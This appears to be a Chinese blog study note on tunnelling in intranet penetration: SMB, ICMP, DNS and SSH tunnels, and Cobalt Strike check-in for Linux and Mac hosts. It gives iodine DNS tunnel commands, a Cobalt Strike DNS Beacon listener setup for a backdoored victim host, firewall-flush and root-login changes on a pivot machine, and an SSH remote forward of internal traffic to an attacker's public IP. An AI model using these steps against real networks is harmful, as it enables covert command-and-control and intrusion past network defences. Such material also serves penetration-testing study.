内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac 简单总结

第126天:内网安全-隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac_内网安全-隧道技术_ssh_dns_icmp_smb_上线通讯linux_mac-CSDN博客

内网渗透---隧道技术_隧道技术csdn-CSDN博客

#SMB 隧道&通讯&上线

判断:445 通讯

上线:借助通讯后绑定上线

通讯:直接 SMB 协议通讯即可

上一篇文章有讲解

#ICMP 隧道&通讯&上线

判断:ping 命令

上线:见前面课程

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel

#DNS 隧道&通讯&上线

在进行DNS查询时,如果查询的域名不在DNS服务器本机的缓存中,就会访问互联网进行查询,然后返回结果。如果在互联网上有一台定制的服务器,那么依靠DNS协议即可进行数据包的交换。

判断:nslookup dig

DNS上线

1、上线环境:内网主机只出网 DNS 协议数据,解决上线

-域名申请及配置

准备一个域名并配置两条NS解析,NS解析将子域名指定其它DNS解析

-监听器创建及配置

http协议无法上线

配置监听器

设置监听器,Payload选择Beacon DNSDNS地址选择刚刚填写的ns1记录ns2记录,下面的DNS地址( Stager)填写A记录,也就是CS.xxx.fun

-后门绑定监听器及生成

在受害者主机执行后门,上线,然后执行命令mode dns -txt

DNS隧道解决通讯问题

2、通讯环境:

内网主机只出网 DNS 协议数据,解决通讯

https://github.com/yarrick/iodine

iodine工作原理是 ,通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。

判断出网:nslookup www.baidu.com

将工具运行起来,运行起来后,你可以输入命令去查看一下网卡,会发现多出一个网卡,这里的选择的网段,千万不要和现有的网段冲突

-服务器:设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向

iodined -f -c -P xiaodi 192.168.0.1 ns1.xiaodi8.com -DD

设置密码 xiaodi 并创建虚拟 IP 及绑定域名指向

-f:在前台运行

-c:禁止检查所有传入请求的客户端IP地址。

-P:客户端和服务端之间用于验证身份的密码。

-D:指定调试级别,-DD指第二级。"D"的数量随级别增加。

-客户端:连接密码 xiaodi 并绑定域名指向

iodine -f -M 200 -P xiaodi ns1.xiaodi8.com

windows不建议用

客户端的工具其实可以直接去官网中下载已经编译好的,但是有一个问题就是无法直接使用,会出现报错,需要安装一个APT网卡

安装软件不现实

客户端的工具运行起来还需要管理员操作,都管理员了,我还要你个DNS隧道干嘛...同样这里,操作完输入命令后,可以看到多出了一个IP地址,刚刚设置的是192.168.0.1网段的IP,那么这里自动就会生成一个192.168.0.2的IP地址。

客户端建立192.168.0.2的虚拟网卡

测试链接

-尝试通讯尝试连接:

ssh root@192.168.0.2 xiaodi

#SSH 隧道&通讯

前提:跳板机为linux,获得root权限,

最好跳板机上不要有过多的防火墙策略,也就是Linux内置的防火墙策略,关策略需要使用root权限。

判断:ssh连接

1、上线:

由于CS无SSH协议监听器配置,无法上线。上线linux需要使用插件

内网渗透---Linux上线_cs上线linux-CSDN博客

2、通讯:

由于SSH协议存在于Linux系统,跳板机必须Linux

iptables -F /* 清除所有规则 */

iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/

iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/

iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */

iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */

iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/

iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT

iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/

iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

iptables-save > /etc/sysconfig/iptables /*保存配置*/

iptables -L /* 显示iptables列表 */

开启ssh协议登录:

vi /etc/ssh/sshd_config

PermitRootLogin yes

PasswordAuthentication yes

/etc/init.d/ssh start

/etc/init.d/ssh restart

ssh参数

-C:压缩传输,提高传输速度

-f:将SSH传输转入后台执行,不占用当前的Shell

-N:建立静默连接(建立了连接,但是看不到具体会话)

-g:允许远程主机连接本地用于转发的端口

-L:本地端口转发

-R:远程端口转发

-D:动态转发(SOCKS代理)

-P:指定SSH端口

本地:出站封,走正向

bash 复制代码
ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
curl http://127.0.0.1:1122

将本地访问1.168080端口流量转发至本地的1122端口

结果:访问192.168.1.166本地1122端口,探测到1.16:8080

ssh远程转发:入站封,走反向

bash 复制代码
ssh -CfNg -R 1234:192.168.1.15:8080 root@47.94.236.117
curl http://127.0.0.1:1234

将跳板机上访问的IP地址及端口流量转发至攻击机上的某个端口,

将本地的访问1.168080端口流量转发至47.94.236.117的1234 端口

结果:探测到内网数据

攻击者访问自己本地的1234即可访问windows的8080端口

#控制上线-插件-Linux&Mac&IOS&Android

内网渗透---Linux上线_cs上线linux-CSDN博客

https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

1、插件使用

2、命令使用

使用参考:

https://gloxec.github.io/CrossC2/zh_cn/

目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径及上传Key文件

4、使用命令或插件绑定HTTPS监听器生成

相关推荐
ice___Cpu22 分钟前
Linux 基本使用和 web 程序部署 ( 8000 字 Linux 入门 )
linux·运维·前端
z2023050824 分钟前
linux 之0号进程、1号进程、2号进程
linux·运维·服务器
HinsCoder41 分钟前
【渗透测试】——Upload靶场实战(1-5关)
笔记·学习·安全·web安全·渗透测试·测试·upload靶场
狐心kitsune1 小时前
erlang学习:Linux常用命令1
linux·学习·erlang
newxtc1 小时前
【天怡AI-注册安全分析报告-无验证方式导致安全隐患】
人工智能·安全
DREAM依旧2 小时前
《深入了解 Linux 操作系统》
linux
网安康sir2 小时前
2024年三个月自学手册 网络安全(黑客技术)
网络·安全·web安全
阿赭ochre2 小时前
Linux环境变量&&进程地址空间
linux·服务器
Iceberg_wWzZ2 小时前
数据结构(Day14)
linux·c语言·数据结构·算法
可儿·四系桜2 小时前
如何在多台Linux虚拟机上安装和配置Zookeeper集群
linux·服务器·zookeeper